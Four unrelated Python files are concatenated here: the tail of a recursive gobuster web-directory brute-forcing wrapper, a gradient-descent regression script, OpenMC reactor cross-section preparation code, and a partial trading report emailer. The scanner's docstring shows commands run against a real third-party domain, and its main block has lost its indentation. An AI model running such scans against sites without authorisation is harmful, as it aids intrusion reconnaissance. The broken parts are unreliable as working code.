            # gobuster 3 moved directory brute forcing under the `dir` subcommand
            command.append("dir")
        if not self.status:
            # don't show status codes
            command.append("-n")
        command.extend(
            [
                "-q",  # don't print banner
                "-e",  # print full URLs
                "-k",  # skip SSL cert verification
                "-t",
                self.threads,
                "-u",
                target,
                "-w",
                self.wordlist,
                "-o",
                f"{self.tmpdir}/{normalized_target}",
            ]
        )
        if self.extensions:
            command.append("-x")
            command.append(self.extensions)
        if self.user:
            # gobuster silently ignores the case where -P is set but -U is not; we'll follow suit.
            command.append("-U")
            command.append(self.user)
        if self.password is not None:
            # password set to anything (including empty string)
            command.append("-P")
            command.append(self.password)
        if self.proxy:
            command.append("-p")
            command.append(self.proxy)
        suppress = subprocess.DEVNULL if self.devnull else None
        try:
            # Non-blocking: completion is detected via the inotify CLOSE_WRITE
            # event on the -o output file, not by waiting on the process.
            subprocess.Popen(command, stderr=suppress)
        except FileNotFoundError as e:
            print(e)
            raise SystemExit
        active_scans.append(normalized_target)

    def process_IN_MODIFY(self, event: pyinotify.Event) -> None:
        """ Handles event produced when a file is modified.
        This function is designed to trigger when any of the watched gobuster output files are appended to. The
        output files are appened to each time a new file/folder is identified by gobuster. This function will
        pull out the new entry and start a new gobuster scan against it, if appropriate.
        Args:
            event: pyinotify.Event
        """
        with open(event.pathname) as f:
            for line in f:
                line = line.strip()
                if self.status:
                    # status codes are included, need to grab just the url for processing
                    # https://assetinventory.bugcrowd.com/favicon.ico (Status: 200)
                    line = line.split(maxsplit=1)[0]
                """
                In response to https://github.com/epi052/recursive-gobuster/issues/2
                In the scans below, 00.php/ should not kick off another scan. The loop below aims to address the problem.
                gobuster -q -n -e -k -t 20 -u https://bluejeans.com/00/ -w /wordlists/seclists/Discovery/Web-Content/common.txt -o /tmp/rcrsv-gbstryv_fcneq/https:__bluejeans.com_00_ -x php
                gobuster -q -n -e -k -t 20 -u https://bluejeans.com/00.php/ -w /wordlists/seclists/Discovery/Web-Content/common.txt -o /tmp/rcrsv-gbstryv_fcneq/https:__bluejeans.com_00.php_ -x php
                """
                for extension in self.extensions.split(","):
                    if line.endswith(f".{extension}"):
                        break
                else:
                    # found a path -> https://somedomain/images, add a forward slash to scan in case of dir-ness
                    tgt = f"{line}/"
                    normalized_target = self._normalize_targetname(tgt)
                    if (
                        normalized_target in active_scans or normalized_target in completed_scans
                    ):  # skip active/complete
                        continue
                    # found a directory that is not being actively scanned and has not already been scanned
                    self.run_gobuster(target=tgt)

    def process_IN_CLOSE_WRITE(self, event: pyinotify.Event) -> None:
        """ Handles event produced when a file that was open for writing is closed.
        This function is designed to trigger when any of the watched gobuster output files are closed. This is
        indicative of scan completion.
        Args:
            event: pyinotify.Event
        """
        normalized_target = self._normalize_targetname(event.name)
        # scan related to the target is complete; remove it from active and place it in complete
        active_scans.remove(normalized_target)
        completed_scans.append(normalized_target)
        if not active_scans:
            # likely, no more scans are running
            time.sleep(3)  # attempt to avoid race condition
            if not active_scans:
                # check one last time
                print(f"All scans complete. Cleaning up.")
                self.cleanup(None, None)

    def cleanup(self, sig, frame) -> None:
        """ Simple function to write results seen so far and remove the temp directory.
        Can be called from either all scans completing, or receiving a SIGINT. When triggered from catching a SIGINT,
        the function is called with two arguments: the signal number and the current stack frame. When we call it
        ourselves, we don't care about those, so we can just call this manually with sig=None,frame=None
        Args:
            sig: signal number or None
            frame: current stack frame or None
        """
        results = list()
        pathtmpdir = Path(self.tmpdir)
        if pathtmpdir.exists():  # ensure we got at least some results
            for file in pathtmpdir.iterdir():
                with file.open() as f:
                    results += f.readlines()
            results.sort()
            # Merge all per-target output files into a single sorted log named
            # after the original (top-level) target.
            with open(
                f"recursive-gobuster_{self._normalize_targetname(self.original_target)}.log", "w"
            ) as f:
                f.write("".join(results))
            shutil.rmtree(self.tmpdir)
        raise SystemExit(0)
def get_gobuster_version() -> int:
    """ Return an int representing gobuster's version.
    There is no --version or similar for gobuster, so this function checks output of running gobuster without
    any options/arguments. Depending on the usage statement, we determine whether or not gobuster is version
    3+ or not.
    Returns:
        int representing gobuster version; internal representation only. Not in sync with gobuster releases
    """
    try:
        proc = subprocess.run(["gobuster"], stdout=subprocess.PIPE)
    except FileNotFoundError as e:
        # FIX: consistent with run_gobuster — report the missing binary and
        # exit cleanly instead of dumping a traceback.
        print(e)
        raise SystemExit
    lines = proc.stdout.splitlines()
    # version 3+ with dns dir etc...
    # FIX: guard against empty output, which used to raise IndexError.
    return 3 if lines and b"Usage:" in lines[0] else 2
def main(args_ns: argparse.Namespace) -> None:
    """Wire up the inotify watch over the temp directory, start the first
    gobuster scan, and run the notifier loop until all scans complete."""
    tmpdir = tempfile.mkdtemp(prefix="rcrsv-gbstr")  # directory for gobuster scan results
    # watch manager stores the watches and provides operations on watches
    wm = pyinotify.WatchManager()
    version = get_gobuster_version()
    handler = EventHandler(
        target=args_ns.target,
        tmpdir=tmpdir,
        wordlist=args_ns.wordlist,
        threads=args_ns.threads,
        extensions=args_ns.extensions,
        # BUG FIX: was `args.devnull` — the module-level global populated by
        # the __main__ guard — instead of the function's own parameter.
        devnull=args_ns.devnull,
        user=args_ns.user,
        password=args_ns.password,
        proxy=args_ns.proxy,
        version=version,
        status=args_ns.status,
    )
    notifier = pyinotify.Notifier(wm, handler)
    # watch for file appends (found dir/file) and files closing (scan complete)
    mask = pyinotify.IN_MODIFY | pyinotify.IN_CLOSE_WRITE
    wm.add_watch(tmpdir, mask)
    handler.run_gobuster(args_ns.target)  # kick off first scan against initial target
    signal.signal(signal.SIGINT, handler.cleanup)  # register signal handler to handle SIGINT
    notifier.loop()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"-t", "--threads", default="20", help="# of threads for each spawned gobuster (default: 20)"
)
parser.add_argument(
"-x",
"--extensions",
help="extensions passed to the -x option for spawned gobuster",
default="",
)
parser.add_argument(
"-w",
"--wordlist",
default="/usr/share/seclists/Discovery/Web-Content/common.txt",
help="wordlist for each spawned gobuster (default: /usr/share/seclists/Discovery/Web-Content/common.txt)",
)
parser.add_argument(
"-d", "--devnull", action="store_true", default=False, help="send stderr to devnull"
)
parser.add_argument("-U", "--user", help="Username for Basic Auth (dir mode only)")
parser.add_argument("-P", "--password", help="Password for Basic Auth (dir mode only)")
parser.add_argument(
"-p", "--proxy", help="Proxy to use for requests [http(s)://host:port] (dir mode only)"
)
parser.add_argument(
"-s",
"--status",
help="Include status code reporting (default: false)",
action="store_true",
default=False,
)
parser.add_argument("target", help="target to scan")
args = parser.parse_args()
main(args)
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# Load the training set; expects columns named 'x' and 'y'.
training = pd.read_csv('E:/train.csv')
x_training = training['x']
y_training = training['y']
# Convert the pandas Series to plain numpy arrays for the descent loop.
x_training = np.array(x_training)
y_training = np.array(y_training)
# print(x_training, " ", y_training)
def finda(m, alpha, y_training, x_training, iterations=90000):
    """Fit y = a0 + a1*x by batch gradient descent.

    Parameters
    ----------
    m : int
        Number of training samples (used as the averaging divisor).
    alpha : float
        Learning rate.
    y_training, x_training : numpy arrays of equal length.
    iterations : int
        Number of descent steps (default preserves the original behaviour).

    Returns
    -------
    (a0, a1) : the fitted intercept and slope (also printed, as before).
    """
    a0 = 0.0
    a1 = 0.0
    mean_square_error = 0.0
    for _ in range(iterations):
        error = (a0 + a1 * x_training) - y_training
        # BUG FIX: MSE is the mean of squared errors, sum(e^2)/m; the original
        # squared the *summed* error, (sum(e))^2/m, which is a different (and
        # misleading) quantity.
        mean_square_error = (1 / m) * np.sum(error ** 2)
        a0 = a0 - (alpha * (2 / m) * np.sum(error))
        a1 = a1 - (alpha * (2 / m) * np.sum(error * x_training))
    print(mean_square_error, " :", "y = ", a0, " + ", a1, "x")
    return a0, a1
# Run the fit (prints the result).
finda(98, 0.0001, y_training, x_training)
# BUG FIX: the rcParams default must be set *before* plt.scatter() for the
# marker style to take effect; the original set it afterwards, doing nothing.
plt.rcParams["scatter.marker"] = ','
plt.scatter(x_training, y_training)
|
import os
import sys
import re
import numpy as np
import openmc
import openmc.mgxs
from make_bn800 import *
# Start global variables
N_LEGEND = 2  # number of Legendre scattering orders read per nuclide
N_DELAY = 1   # number of delayed-neutron families
# PATH
# Root directory holding one sub-directory of section files per temperature.
PATH = "/home/barakuda/Рабочий стол/hdf5_openmc/XMAS172jeff2p2woZr71"
# PATH
# XMAS-172 energy group boundaries in eV, listed from highest to lowest
# (reversed below, since openmc expects ascending boundaries).
ENERGIES = [19640330,
            17332530, 14918250, 13840310, 11618340, 10000000, 8187308,
            6703200, 6065307, 5488116, 4493290, 3678794, 3011942,
            2465970, 2231302, 2018965, 1652989, 1353353, 1224564,
            1108032, 1002588, 907179.5, 820850, 608100.625, 550232.188,
            497870.688, 450492, 407622, 301973.812, 273237.188, 247235.297,
            183156.406, 122773.398, 111090, 82297.4688, 67379.4688, 55165.6406,
            40867.7109, 36978.6406, 29283, 27394.4492, 24787.5195, 16615.5703,
            15034.3896, 11137.75, 9118.82031, 7465.85791, 5530.84424, 5004.51416,
            3526.62207, 3354.62598, 2248.6731, 2034.68396, 1507.33105, 1433.81702,
            1234.09802, 1010.39398, 914.24231, 748.518311, 677.287415, 453.999298,
            371.703186, 304.324799, 203.994995, 148.625397, 136.742004, 91.660881,
            75.6735687, 67.9040527, 55.5951309, 51.5780182, 48.2515984, 45.5174408,
            40.1689987, 37.2665291, 33.72015, 30.5112591, 27.6077309, 24.9804993,
            22.6032906, 19.4548397, 15.9282703, 13.70959, 11.2244596, 9.90555382,
            9.18981361, 8.31528664, 7.523983, 6.1601162, 5.34642982, 5.04347706,
            4.12925005, 4, 3.38074994, 3.29999995, 2.76792002, 2.72000003,
            2.5999999, 2.54999995, 2.3599999, 2.13000011, 2.0999999, 2.01999998,
            1.92999995, 1.84000003, 1.755, 1.66999996, 1.59000003, 1.5,
            1.47500002, 1.44000006, 1.37, 1.33749998, 1.29999995, 1.23500001,
            1.16999996, 1.14999998, 1.12300003, 1.11000001, 1.097, 1.07099998,
            1.04499996, 1.03499997, 1.01999998, 0.995999992, 0.986000001,
            0.972000003, 0.949999988, 0.930000007, 0.910000026, 0.860000014,
            0.850000024, 0.790000021, 0.779999971, 0.704999983, 0.625,
            0.540000021, 0.5, 0.485000014, 0.432999998, 0.400000006,
            0.391000003, 0.349999994, 0.319999993, 0.314500004, 0.300000012,
            0.280000001, 0.247999996, 0.219999999, 0.188999996, 0.180000007,
            0.159999996, 0.140000001, 0.134000003, 0.115000002, 0.100000001,
            9.50E-02, 8.00E-02, 7.70E-02, 6.70E-02, 5.80E-02, 5.00E-02,
            4.20E-02, 3.50E-02, 3.00E-02, 2.50E-02, 2.00E-02, 1.50E-02,
            1.00E-02, 6.90E-03, 5.00E-03, 3.00E-03, 1.00E-05]
# Temperatures (K) for which section files are available.
tempdata = [300]
# tempdata = [300, 600, 900, 1200, 1500, 1800, 2100]
# {temperature: {nuclide name: groupsection}} -- filled by temp_libgroup().
libgroup = {t : {} for t in tempdata}
ENERGIES = ENERGIES[::-1]
# Instantiate the energy group data
groups = openmc.mgxs.EnergyGroups(np.array(ENERGIES))
# end global variables
class groupsection:
    """Multigroup cross-section data for one nuclide at one temperature,
    parsed from a plain-text section file."""

    def __init__(self, name, egroup, nlegendr, numdel, temp):
        self.csname = name            # nuclide / section name
        self.energy = egroup          # energy group boundaries (ng + 1 values)
        self.ng = len(self.energy) - 1
        self.order = nlegendr         # number of Legendre scattering orders
        self.numdel = numdel          # number of delayed-neutron families
        self.temperature = temp

    def read_section(self, path):
        """Parse the section file at *path*, populating the cross-section
        arrays (sf, stot, sabs, scapt, schi, nusf, chidel, nusfdel, scatxs,
        xsmatrix) as the corresponding markers are encountered.

        FIXES: regex patterns containing ``\\s`` are raw strings now (plain
        strings raise DeprecationWarning / SyntaxWarning on modern Python);
        the file is opened with ``with`` so it is closed even on a parse error.
        """
        with open(path, 'r') as f:
            self._is_finished = False
            self.nusfdel = []
            self.chidel = []
            self.scatxs = {i: [] for i in range(self.order)}
            self.xsmatrix = []
            _matxs = {i: [] for i in range(self.order)}
            _curlegendr = 0
            for line in f:
                if re.search(r"\sSF\s", line):
                    self.sf = self._read_cs_data(f)
                if re.search("STOT", line):
                    self.stot = self._read_cs_data(f)
                if re.search("SABS", line):
                    self.sabs = self._read_cs_data(f)
                if re.search("SCAPT", line):
                    self.scapt = self._read_cs_data(f)
                if re.search("CHI0", line):
                    self.schi = self._read_cs_data(f)
                if re.search("NUSF0", line):
                    self.nusf = self._read_cs_data(f)
                if re.search("CHIDEL", line):
                    self.chidel.append(self._read_cs_data(f))
                if re.search("NUSFDEL", line):
                    self.nusfdel.append(self._read_cs_data(f))
                if re.search("SIGS", line):
                    # Legendre order is the trailing digit of the marker.
                    _curlegendr = int(line.split()[-1][-1])
                    self.scatxs[_curlegendr].append(self._read_scat_data(f))
                if re.search(r"\sSCAT\d+", line):
                    _curlegendr = int(line.split()[-1][-1])
                if re.search("SCATTERING FROM GROUP", line):
                    _matxs[_curlegendr].append(self._read_scat_data(f))
            # Assemble the ng x ng scattering matrix per Legendre order; the
            # order axis is rolled last -> shape (ng, ng, n_orders).
            for k, v in _matxs.items():
                if len(v) > 0:
                    self.xsmatrix.append(np.array(v).reshape(self.ng, self.ng))
            self.xsmatrix = np.array(self.xsmatrix)
            if len(self.xsmatrix.shape) > 2:
                self.xsmatrix = np.rollaxis(self.xsmatrix, 0, 3)

    def _read_cs_data(self, f):
        """Read one float per energy group (ng lines) from the open file."""
        arr = []
        for e in self.energy[1:]:
            line = next(f)
            arr.append(float(line.strip()))
        return np.array(arr)

    def _read_scat_data(self, f):
        """Read whitespace-separated floats until a full row (ng values) is collected."""
        arr = []
        while len(arr) < self.ng:
            line = next(f)
            arr.extend([float(s) for s in line.split()])
        return np.array(arr)
# Instantiate the energy group data
# NOTE(review): this duplicates the identical module-level `groups` created in
# the globals section above; harmless, but one of the two can be removed.
groups = openmc.mgxs.EnergyGroups(np.array(ENERGIES))
def temp_interolate(temparray, T):
    """Return (position, weight) pairs for linear interpolation of temperature
    T on the ascending grid *temparray*.

    NOTE(review): the branches are inconsistent. The interior branch returns
    grid *indices* (i, i+1) — which is what prepare_mg expects (it does
    tempdata[indarray[...]]) — while both boundary branches return the
    temperature *value* itself, which is what
    prepare_temperature_independed_mg expects (it does libgroup[el[0]]).
    Also, the low boundary returns a single pair while prepare_mg always
    indexes element [1]. One caller or the other will break away from the
    interior case; confirm the intended contract (the commented-out return
    below suggests the value-based variant was considered).
    """
    if (T <= temparray[0]):
        return [(temparray[0], 1)]
    elif (T >= temparray[-1]):
        return [(temparray[-1], 1), (temparray[-1], 0)]
    else:
        # Find the first grid point above T; interpolate between i and i+1.
        for j,_t in enumerate(temparray):
            if (_t > T):
                i = j-1
                t = temparray[i]
                break
        return [(i, (temparray[i+1] -T)/(temparray[i+1] - temparray[i])), (i + 1, (T - t)/(temparray[i+1] - temparray[i]))]
        #return [(t, (temparray[i+1] -T)/(temparray[i+1] - temparray[i])), (temparray[i+1], (T - t)/(temparray[i+1] - temparray[i]))]
def temp_libgroup(tempdata):
    """Read every section file found under PATH/<temperature> into the
    module-level `libgroup` dictionary and return it."""
    for temp in tempdata:
        walk_entries = [entry for entry in os.walk(os.path.join(PATH, str(temp)))]
        # The top directory's file list is the last element of the first entry.
        for filename in walk_entries[0][-1]:
            section = groupsection(filename, ENERGIES, N_LEGEND, N_DELAY, temp)
            libgroup[temp][filename] = section
            section.read_section(os.path.join(PATH, str(temp), filename))
    return libgroup

openmclib = {}
def prepare_temperature_independed_mg(libgroup, conc, namenuclide, tempdata,
                                      groups, mattemp):
    """
    Prepare multigroup data using temperature-interpolated constants, one
    openmc.XSdata per material (registered at the first library temperature).

    Parameters
    ----------
    libgroup : dict
        {temperature: {nuclide name: groupsection}};
    :param conc: dict
        - dictionary with name of material : np.array - R*8 concentration of nuclide;
    :param namenuclide:
        - a list of nuclide names;
    :param mattemp:
        - dictionary with name of material : temperature value;
    :return:
        - dictionary with name of material : openmc.XSdata element
    """
    # TEMPERATURE INDEPENDENT CASE
    openmclib = {}
    for name, val in conc.items():
        openmclib[name] = openmc.XSdata(name, groups, temperatures=[tempdata[0]])
        openmclib[name].order = 1
        # Per-material accumulators, one value per energy group.
        stot = np.zeros(len(ENERGIES) - 1, dtype=np.double)
        sabs = np.zeros(len(ENERGIES) - 1, dtype=np.double)
        scapt = np.zeros(len(ENERGIES) - 1, dtype=np.double)
        sf = np.zeros(len(ENERGIES) - 1, dtype=np.double)
        nusf = np.zeros(len(ENERGIES) - 1, dtype=np.double)
        chi = np.zeros(len(ENERGIES) - 1, dtype=np.double)
        scatter = np.zeros((len(ENERGIES) - 1, len(ENERGIES) - 1, 2), dtype=np.double)
        concentration = 0.0
        for n, v in zip(namenuclide, val):
            # Blend each nuclide over the two bracketing temperatures.
            # NOTE(review): this treats el[0] as a libgroup *key* (a
            # temperature), which only matches temp_interolate's boundary
            # branches — see the note on temp_interolate.
            for el in temp_interolate(tempdata, mattemp[name]):
                tt = el[0]
                wt = el[1]
                if (n in libgroup[tt].keys()):
                    stot += libgroup[tt][n].stot * v * wt
                    sabs += libgroup[tt][n].sabs * v * wt
                    scapt += libgroup[tt][n].scapt * v * wt
                    sf += libgroup[tt][n].sf * v * wt
                    nusf += libgroup[tt][n].nusf * v * wt
                    scatter += libgroup[tt][n].xsmatrix * v * wt
            # Fission spectrum: concentration-weighted over fissile nuclides,
            # always taken from the first library temperature.
            if (n in libgroup[tempdata[0]].keys()):
                if (libgroup[tempdata[0]][n].sf.sum() > 0):
                    concentration += v
                    chi += libgroup[tempdata[0]][n].schi * v
        if (concentration > 0):
            chi = chi / concentration
        openmclib[name].set_total(stot, temperature=tempdata[0])
        openmclib[name].set_absorption(sabs, temperature=tempdata[0])
        openmclib[name].set_scatter_matrix(scatter, temperature=tempdata[0])
        openmclib[name].set_fission(sf, temperature=tempdata[0])
        openmclib[name].set_nu_fission(nusf, temperature=tempdata[0])
        openmclib[name].set_chi(chi, temperature=tempdata[0])
    return openmclib
#
def prepare_mg(libgroup, conc, namenuclide, tempdata, groups, mattemp):
    """Prepare multigroup data with temperature interpolation, vectorised over
    materials; writes the accumulated arrays straight into the private fields
    of each openmc.XSdata.

    Parameters
    ----------
    libgroup : dict
        {temperature: {nuclide name: groupsection}} as built by temp_libgroup().
    conc : dict
        {material name: array of nuclide concentrations}.
    namenuclide : list
        Nuclide names aligned with the concentration arrays.
    tempdata : list
        Available library temperatures (ascending).
    groups : openmc.mgxs.EnergyGroups
        Energy group structure for the produced XSdata objects.
    mattemp : dict
        {material name: material temperature}.

    Returns
    -------
    dict
        {material name: openmc.XSdata}.
    """
    openmclib = {}
    nsize = len([k for k in conc])
    values = np.array([v for v in conc.values()])
    values = values.reshape(nsize, len(values[0]))
    indices = nsize * [(tempdata[0], 1.0)]
    # BUG FIX: np.int was deprecated in numpy 1.20 and removed in 1.24; the
    # documented replacement is the builtin int. (Also dropped the unused
    # t0/t1 timing locals, which relied on a `time` name that is not imported
    # here.)
    indarray = np.zeros((nsize, 2), dtype=int)
    wgtarray = np.zeros((nsize, 2), dtype=np.double)
    stot = np.zeros((nsize, len(ENERGIES) - 1), dtype=np.double)
    sabs = np.zeros((nsize, len(ENERGIES) - 1), dtype=np.double)
    scapt = np.zeros((nsize, len(ENERGIES) - 1), dtype=np.double)
    sf = np.zeros((nsize, len(ENERGIES) - 1), dtype=np.double)
    nusf = np.zeros((nsize, len(ENERGIES) - 1), dtype=np.double)
    chi = np.zeros((nsize, len(ENERGIES) - 1), dtype=np.double)
    scatter = np.zeros((nsize, len(ENERGIES) - 1, len(ENERGIES) - 1, 2),
                       dtype=np.double)
    # Per-material interpolation indices/weights on the temperature grid.
    for i, name in enumerate(mattemp.keys()):
        openmclib[name] = openmc.XSdata(name, groups, temperatures=[tempdata[0]])
        openmclib[name].order = 1
        indices[i] = temp_interolate(tempdata, mattemp[name])
        indarray[i, 0] = indices[i][0][0]
        indarray[i, 1] = indices[i][1][0]
        wgtarray[i, 0] = indices[i][0][1]
        wgtarray[i, 1] = indices[i][1][1]
    # nuclind[i][j] > 0 marks nuclide i as present at temperature index j.
    nuclind = np.zeros((len(namenuclide), len(tempdata)), dtype=int)
    for i, n in enumerate(namenuclide):
        for j, tt in enumerate(tempdata):
            if n in libgroup[tt].keys():
                nuclind[i][j] = i + 1
    for i in range(nsize):
        for ind in range(len(namenuclide)):
            for j in [0, 1]:
                if nuclind[ind][indarray[i, j]] > 0:
                    nuc = libgroup[tempdata[indarray[i, j]]][namenuclide[ind]]
                    weight = values[i, ind] * wgtarray[i, j]
                    stot[i, :] += nuc.stot * weight
                    sabs[i, :] += nuc.sabs * weight
                    scapt[i, :] += nuc.scapt * weight
                    sf[i, :] += nuc.sf * weight
                    nusf[i, :] += nuc.nusf * weight
                    scatter[i, :, :] += nuc.xsmatrix * weight
            concentration = 0.0
            if namenuclide[ind] in libgroup[tempdata[0]].keys():
                if libgroup[tempdata[0]][namenuclide[ind]].sf.sum() > 0:
                    concentration += values[i, ind]
                    chi[i, :] += libgroup[tempdata[0]][namenuclide[ind]].schi * values[i, ind]
            # NOTE(review): unlike the sibling prepare_* functions, chi is
            # never renormalised by the accumulated fissile concentration, and
            # `concentration` resets on every nuclide — confirm intended.
    for i, name in enumerate(conc.keys()):
        openmclib[name]._total[0] = stot[i, :]
        openmclib[name]._absorption[0] = sabs[i, :]
        openmclib[name]._scatter_matrix[0] = scatter[i, :, :]
        openmclib[name]._fission[0] = sf[i, :]
        if sum(sf[i, :]) > 0:
            openmclib[name]._fissionable = True
        openmclib[name]._nu_fission[0] = nusf[i, :]
        openmclib[name]._chi[0] = chi[i, :]
    return openmclib
#
def prepare_temperature_depended_mg(libgroup, conc, namenuclide, temperature):
    """
    Prepare multigroup data with temperature-dependent constants.

    Parameters
    ----------
    libgroup : dict
        {temperature : {nuclide name : group-section object}}.
    conc : dict
        {material name : np.array (R*8) of nuclide concentrations}.
    namenuclide : list
        Nuclide names, ordered like the concentration arrays.
    temperature : dict
        {material name : temperature value}.
        NOTE(review): currently unused in this function — data is built for
        every temperature in the module-level ``tempdata``; confirm whether
        per-material temperatures were intended.

    Returns
    -------
    dict
        {material name : openmc.XSdata} with macroscopic cross sections set
        at each temperature in ``tempdata``.
    """
    # TEMPERATURE DEPENDENT CASE
    openmclib = {}
    for name, val in conc.items():
        openmclib[name] = openmc.XSdata(name, groups, temperatures=tempdata)
        openmclib[name].order = 1  # two scattering moments (last axis of scatter is 2)
        for tt in tempdata:
            # Fresh accumulators for this material/temperature pair.
            stot = np.zeros(len(ENERGIES) - 1, dtype=np.double)
            sabs = np.zeros(len(ENERGIES) - 1, dtype=np.double)
            # NOTE(review): scapt is accumulated below but never written into
            # the XSdata object — confirm whether capture was meant to be set.
            scapt = np.zeros(len(ENERGIES) - 1, dtype=np.double)
            sf = np.zeros(len(ENERGIES) - 1, dtype=np.double)
            nusf = np.zeros(len(ENERGIES) - 1, dtype=np.double)
            chi = np.zeros(len(ENERGIES) - 1, dtype=np.double)
            scatter = np.zeros((len(ENERGIES) - 1, len(ENERGIES) - 1, 2), dtype=np.double)
            concentration = 0.0
            for n, v in zip(namenuclide, val):
                # Mix macroscopic XS: microscopic data times concentration.
                stot += libgroup[tt][n].stot * v
                sabs += libgroup[tt][n].sabs * v
                scapt += libgroup[tt][n].scapt * v
                sf += libgroup[tt][n].sf * v
                nusf += libgroup[tt][n].nusf * v
                scatter += libgroup[tt][n].xsmatrix * v
                if (libgroup[tt][n].sf.sum() > 0):
                    # Fission spectrum is averaged over fissionable nuclides only.
                    concentration += v
                    chi += libgroup[tt][n].schi * v
            if (concentration > 0):
                chi = chi / concentration
            openmclib[name].set_total(stot, temperature=tt)
            openmclib[name].set_absorption(sabs, temperature=tt)
            openmclib[name].set_scatter_matrix(scatter, temperature=tt)
            openmclib[name].set_fission(sf, temperature=tt)
            openmclib[name].set_nu_fission(nusf, temperature=tt)
            openmclib[name].set_chi(chi, temperature=tt)
    return openmclib
def make_libgroup_micro(nameoflib):
    """Build a per-nuclide (micro) multigroup cross-section library.

    For every temperature in the module-level ``tempdata``, the group
    constants of every nuclide in the library returned by ``temp_libgroup``
    are copied into an openmc.XSdata object, and the collection is exported
    as an openmc.MGXSLibrary HDF5 file.

    :param nameoflib: output file name for the HDF5 library.
    """
    libgroup = temp_libgroup(tempdata)
    openmclib = {}
    for tt in tempdata:
        for n in libgroup[tt]:
            if (n not in openmclib):
                openmclib[n] = openmc.XSdata(n, groups, temperatures=tempdata)
                # NOTE(review): the original code had a dead branch that set
                # order = 0 for P0-only matrices (xsmatrix.shape[-1] < 2) and
                # then unconditionally overwrote it with order = 1.  The
                # effective behavior (order == 1 for every nuclide) is kept
                # here; confirm whether the P0 branch was actually intended.
                openmclib[n].order = 1
            # Copy the scattering matrix into a (G, G, 2) buffer; a (G, G, 1)
            # P0-only matrix broadcasts across both moments.
            scatter = np.zeros((len(ENERGIES) - 1, len(ENERGIES) - 1, 2), dtype=np.double)
            scatter += libgroup[tt][n].xsmatrix*1.0
            # Identical data writing for new and already-registered nuclides
            # (the original duplicated this block in both if/else branches).
            openmclib[n].set_total(libgroup[tt][n].stot, temperature=tt)
            openmclib[n].set_absorption(libgroup[tt][n].sabs, temperature=tt)
            openmclib[n].set_scatter_matrix(scatter, temperature=tt)
            openmclib[n].set_fission(libgroup[tt][n].sf, temperature=tt)
            openmclib[n].set_nu_fission(libgroup[tt][n].nusf, temperature=tt)
            openmclib[n].set_chi(libgroup[tt][n].schi, temperature=tt)
    mg_cross_sections_file = openmc.MGXSLibrary(groups)
    mg_cross_sections_file.add_xsdatas([openmclib[o] for o in openmclib])
    mg_cross_sections_file.export_to_hdf5(nameoflib)
def make_libgroup_macro(nameoflib):
    """Build a per-material (macro) multigroup cross-section library.

    Mixes nuclide group constants with material concentrations obtained from
    ``make_model`` (including sodium density corrections and control-rod
    materials) and exports the result as an openmc.MGXSLibrary HDF5 file.

    :param nameoflib: output file name for the HDF5 library.
    """
    res,resl, dicel, el, rodel, dolna = make_model()
    libgroup = temp_libgroup(tempdata)
    nuclval = len(resl)
    # Sodium concentration depends on its density at 600 K and the sodium
    # volume fraction (dolna) of each zone.
    indexNa = el.index("Na")
    for key, value in dicel.items():
        value[indexNa] = densna(600.0) * 0.6022 / 23 * dolna[key[0]][key[1]]
    for key, value in rodel.items():
        value[indexNa] = densna(600.0) * 0.6022 / 23 * dolna[key[0]][key[1]]
    nuclist, element_from, element_ind, element_val = get_unite_list(resl, el)
    concentration = np.zeros(len(nuclist))
    conc = {}
    temp = {}
    for key,value in res.items():
        t0 = time.time()
        concentration[:nuclval] = value
        for f, i, v in zip(element_from, element_ind, element_val):
            concentration[i] += dicel[key][f] * v
        key_1 = ''+str(key)+''
        conc[key_1] = concentration
        temp[key_1] = 600.0 # for all zones a temperature the same : 600.0
        # Re-bind to a fresh zeroed array; the filled array stays referenced
        # by conc[key_1].
        concentration = 0.0*concentration[:]
        # BUGFIX: the elapsed time is measured in seconds; convert to minutes
        # so the value matches the printed unit.
        print("Estimated time is {} min".format((time.time() - t0) / 60))
    rodnuclist, element_from, element_ind, element_val = get_unite_list([], el)
    concentration = np.zeros(len(rodnuclist))
    concrod = {}
    temprod = {}
    for key,value in rodel.items():
        t0 = time.time()
        for f, i, v in zip(element_from, element_ind, element_val):
            concentration[i] += rodel[key][f] * v
        key_1 = ''+str(key)+''
        concrod[key_1] = concentration
        temprod[key_1] = 600.0 # for all zones a temperature the same : 600.0
        concentration = 0.0*concentration[:]
        # BUGFIX: same seconds-vs-minutes mismatch as above.
        print("Estimated time is {} min".format((time.time() - t0) / 60))
    openmclib = prepare_mg(libgroup, conc, resl, tempdata,
                           groups, temp)
    openmclib.update(prepare_mg(libgroup, concrod, rodnuclist, tempdata,
                                groups, temprod))
    mg_cross_sections_file = openmc.MGXSLibrary(groups)
    mg_cross_sections_file.add_xsdatas([openmclib[o] for o in openmclib])
    mg_cross_sections_file.export_to_hdf5(nameoflib)
|
#!/usr/bin/python3
import argparse
import datetime
import os
import re

from jinja2 import Environment, FileSystemLoader

import db.mongodb as md
from utils.email_obj import EmailObj
from setup import *
db_name = trade_db_name
if __name__ == "__main__":
    # Daily report: read the tail of a trading log plus recent orders from
    # MongoDB, render them into an HTML template and e-mail the result.
    parser = argparse.ArgumentParser(description='Daily Report')
    parser.add_argument('-i', help='Instance')
    parser.add_argument('-d', help='Included Days')
    parser.add_argument('-f', help='Log file name')
    parser.add_argument('-r', help='Receiver Email Address')
    args = parser.parse_args()
    # All four arguments are mandatory.
    if not (args.i and args.d and args.r and args.f):
        parser.print_help()
        exit(1)
    instance_id = args.i
    days = args.d
    email_addr = args.r
    file_name = args.f
    template_dir = location('monitor/template')
    print(template_dir)
    subject = 'Quant Daily Report - ' + instance_id
    # Include the last ~1800 bytes of the log file in the report body.
    with open(file_name, 'r') as f:
        off = 1800
        f.seek(0, os.SEEK_END)
        # BUGFIX: clamp to the start of the file so a log shorter than
        # `off` bytes does not raise "negative seek position".
        f.seek(max(f.tell() - off, 0), os.SEEK_SET)
        lines = f.readlines()
    # join() instead of repeated += avoids quadratic string building.
    process_info = "".join(line + "<br>" for line in lines)
    print(process_info)
    db = md.MongoDB(mongo_user, mongo_pwd, db_name, db_url)
    collection = 'orders'
    # Only orders created within the last `days` days.
    begin_time = datetime.datetime.now() - datetime.timedelta(days=int(days))
    orders = db.find_sort(collection, {"instance_id": instance_id,
        "create_time": {"$gte": int(begin_time.timestamp())}}, 'create_time', -1)
    print('orders:', orders)
    for order in orders:
        # Strip internal fields and humanize the timestamp for display.
        del order['_id']
        del order['instance_id']
